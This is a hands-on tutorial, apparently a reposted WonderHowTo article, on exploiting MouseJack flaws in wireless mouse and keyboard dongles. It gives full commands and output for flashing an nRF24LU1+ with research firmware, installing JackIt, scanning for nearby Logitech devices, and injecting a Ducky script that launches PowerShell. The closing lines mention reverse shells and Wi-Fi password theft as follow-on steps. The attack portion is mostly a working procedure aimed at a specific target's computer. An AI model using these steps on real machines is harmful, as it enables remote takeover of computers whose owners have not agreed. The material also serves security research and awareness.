Wireless mice and keyboards manufactured by Logitech, Dell, HP, and Microsoft are all affected by many of the MouseJack vulnerabilities. An attacker with an nRF24LU1+ can wirelessly inject keystrokes into most of these USB dongles (shown below) as well as sniff keystrokes. Ultimately, it allows the attacker to remotely control a computer from up to 250-feet away.
The concept of keystroke sniffing and injection was first made public by Thorsten Schroeder and Max Moser in 2010. Later, Samy Kamkar debuted KeySweeper, an Arduino-based USB wall charger designed to passively sniff and log keystrokes made by Microsoft keyboards.
Below is an example of wireless keystroke injection attacks performed from 75-feet away. Notice the vulnerable Logitech USB dongle attached to my laptop.
Several dependencies are required to execute the Python scripts used to build and automate the flashing process.
$ apt-get install sdcc binutils python python-pip git
$ pip install --upgrade pip
$ pip install --upgrade -I pyusb
$ pip install --upgrade platformio
Clone the MouseJack repository of scripts on GitHub into the /opt
directory.
$ git clone https://github.com/BastilleResearch/mousejack /opt/mousejack
Cloning into '/opt/mousejack'...
remote: Enumerating objects: 285, done.
remote: Total 285 (delta 0), reused 0 (delta 0), pack-reused 285
Receiving objects: 100% (285/285), 8.63 MiB | 353.00 KiB/s, done.
Resolving deltas: 100% (131/131), done.
Change into the new mousejack/
directory. Use the submodule init
options to initialize the local configuration file for the nrf-research-firmware. This is the firmware being flashed onto the nRF24LU1+ device.
/opt/mousejack$ git submodule init
Submodule 'nrf-research-firmware' (https://github.com/BastilleResearch/nrf-research-firmware.git) registered for path 'nrf-research-firmware'
Use the submodule update
options to fetch all the data and checkout the appropriate commit listed.
/opt/mousejack$ git submodule update
Cloning into '/opt/mousejack/nrf-research-firmware'...
Submodule path 'nrf-research-firmware': checked out '02b84d1c4e59c0fb98263c83b2e7c7f9863a3b93'
Change into the nrf-research-firmware/
directory. With make
, execute the Makefile.
nrf-research-firmware$ make
mkdir -p bin
sdcc --model-large --std-c99 -c src/main.c -o bin/main.rel
sdcc --model-large --std-c99 -c src/usb.c -o bin/usb.rel
sdcc --model-large --std-c99 -c src/usb_desc.c -o bin/usb_desc.rel
sdcc --model-large --std-c99 -c src/radio.c -o bin/radio.rel
sdcc --xram-loc 0x8000 --xram-size 2048 --model-large bin/main.rel bin/usb.rel bin/usb_desc.rel bin/radio.rel -o bin/dongle.ihx
objcopy -I ihex bin/dongle.ihx -O binary bin/dongle.bin
objcopy --pad-to 26622 --gap-fill 255 -I ihex bin/dongle.ihx -O binary bin/dongle.formatted.bin
objcopy -I binary bin/dongle.formatted.bin -O ihex bin/dongle.formatted.ihx
At this point, the nRF24LU1+ device should be inserted into the computer.
Then, execute the make install
command.
/nrf-research-firmware$ make install
./prog/usb-flasher/usb-flash.py bin/dongle.bin
[2019-04-25 23:55:44.351] Looking for a compatible device that can jump to the Nordic bootloader
[2019-04-25 23:55:44.378] Device found, jumping to the Nordic bootloader
[2019-04-25 23:55:44.969] Looking for a device running the Nordic bootloader
[2019-04-25 23:55:45.171] Writing image to flash
[2019-04-25 23:55:45.808] Verifying write
[2019-04-25 23:55:45.867] Firmware programming completed successfully
[2019-04-25 23:55:45.867] Please unplug your dongle or breakout board and plug it back in.
As instructed, unplug the nRF24LU1+ from the computer. To verify the firmware was flashed, plug it back into the computer and use the dmesg
command. The product and manufacture lines should read “Research Firmware” and “RFStorm,” respectively.
/nrf-research-firmware$ dmesg
[ 2433.986481] usb 2-1: new full-speed USB device number 3 using xhci_hcd
[ 2434.136930] usb 2-1: New USB device found, idVendor=1915, idProduct=0102, bcdDevice= 0.01
[ 2434.136938] usb 2-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0
[ 2434.136942] usb 2-1: Product: Research Firmware
[ 2434.136946] usb 2-1: Manufacturer: RFStorm
There are several great Python scripts included in the MouseJack repository, but we’ll instead use JackIt to automate keystroke injection.
$ git clone https://github.com/insecurityofthings/jackit.git /opt/jackit
Cloning into '/opt/jackit'...
remote: Enumerating objects: 718, done.
remote: Total 718 (delta 0), reused 0 (delta 0), pack-reused 718
Receiving objects: 100% (718/718), 171.39 KiB | 153.00 KiB/s, done.
Resolving deltas: 100% (439/439), done.
Change into the new jackit/
directory and install dependencies with pip
.
/opt/jackit$ pip install -e .
Obtaining file:///opt/jackit
Requirement already satisfied: click==5.1 in /usr/local/lib/python2.7/dist-packages (from JackIt==0.1.0) (5.1)
Collecting pyusb==1.0.0 (from JackIt==0.1.0)
Downloading https://files.pythonhosted.org/packages/8a/19/66fb48a4905e472f5dfeda3a1bafac369fbf6d6fc5cf55b780864962652d/PyUSB-1.0.0.tar.gz (52kB)
|████████████████████████████████| 61kB 81kB/s
Collecting six==1.10.0 (from JackIt==0.1.0)
Downloading https://files.pythonhosted.org/packages/c8/0a/b6723e1bc4c516cb687841499455a8505b44607ab535be01091c0f24f079/six-1.10.0-py2.py3-none-any.whl
Collecting tabulate==0.7.5 (from JackIt==0.1.0)
Downloading https://files.pythonhosted.org/packages/db/40/6ffc855c365769c454591ac30a25e9ea0b3e8c952a1259141f5b9878bd3d/tabulate-0.7.5.tar.gz
Building wheels for collected packages: pyusb, tabulate
Building wheel for pyusb (setup.py) ... done
Stored in directory: /root/.cache/pip/wheels/a6/69/c7/258e736ee9bdb4553bd9701424b259436b979cf96201af612f
Building wheel for tabulate (setup.py) ... done
Stored in directory: /root/.cache/pip/wheels/96/9c/9a/369b6376b11523584a6040a89488c28f0f88cb52167dceb648
Successfully built pyusb tabulate
Installing collected packages: pyusb, six, tabulate, JackIt
Found existing installation: pyusb 1.0.2
Uninstalling pyusb-1.0.2:
Successfully uninstalled pyusb-1.0.2
Found existing installation: six 1.12.0
Uninstalling six-1.12.0:
Successfully uninstalled six-1.12.0
Running setup.py develop for JackIt
Successfully installed JackIt pyusb-1.0.0 six-1.10.0 tabulate-0.7.5
Scan the surrounding area for vulnerable devices by simply typing jackit
into any terminal. JackIt will continuously scan the area for wireless mice and keyboards. A vulnerable device will identify its address (serial number), channel, and type in the terminal.
$ jackit
____. __ .___ __
| |____ ____ | | _| |/ |_
| \__ \ _/ ___\| |/ / \ __\
/\__| |/ __ \\ \___| <| || |
\________(____ /\___ >__|_ \___||__|
\/ \/ \/
JackIt Version 1.00
Created by phikshun, infamy
[!] You must supply a ducky script using --script <filename>
[!] Attacks are disabled.
[+] Starting scan...
[+] Scanning every 5s CTRL-C when ready.
KEY ADDRESS CHANNELS COUNT SEEN TYPE PACKET
----- -------------- ------------------------ ------- ----------- ------------ -----------------------------
1 C7:D4:21:98:07 74 3 0:00:07 ago Logitech HID 00:C2:00:00:03:10:00:00:00:2B
This information can be used for a targeted attack. For example, the below USB Rubber Ducky payload is used to open a run window and inject keystrokes into the target computer.
GUI r
DELAY 1000
STRING powershell <payload here>
ENTER
Inject keystrokes into the target device with the following command.
$ jackit --reset --address C7:D4:21:98:07 --vendor Logitech --script /path/to/ducky/script.txt
Press Ctrl + c
to stop scanning. JackIt will ask which address to inject the keystrokes. This is a targeted attack, so only one serial number will appear in the scan. Press 1
, then Enter
.
[+] Sniffing for C7:D4:21:98:07 every 5s CTRL-C when ready.
KEY ADDRESS CHANNELS COUNT SEEN TYPE PACKET
----- -------------- ---------- ------- ----------- ------------ -----------------------------
1 C7:D4:21:98:07 2 1 0:00:10 ago Logitech HID 00:C2:00:00:00:00:00:00:00:00
^C
[+] Select target keys (1-1) separated by commas, or 'all': [all]: 1
[+] Ping success on channel 65
[+] Sending attack to C7:D4:21:98:07 [Logitech HID] on channel 65
[+] All attacks completed
When the keystrokes are injected, the device will perform the following actions.
The Ducky Script will open the run window and type some arbitrary text. In the above example, the Windows computer is backdoored in seconds. More complex PowerShell attacks may include Wi-Fi password exfiltration, live streaming the Windows 10 desktop, and Powercat reverse shells with payloads hosted on Microsoft servers.
There are still so many vulnerable mice and keyboards in the wild. Since the MouseJack white paper was released in 2016, some vendors have issued firmware updates for products not utilizing one-time programmable memory (PROM). Still, most vulnerable USB dongles can’t be patched due to hardware limitations. Even if they are patched, devices are still vulnerable to attacks.
Authored by tokyoneon, this post was originally published on WonderHowTo.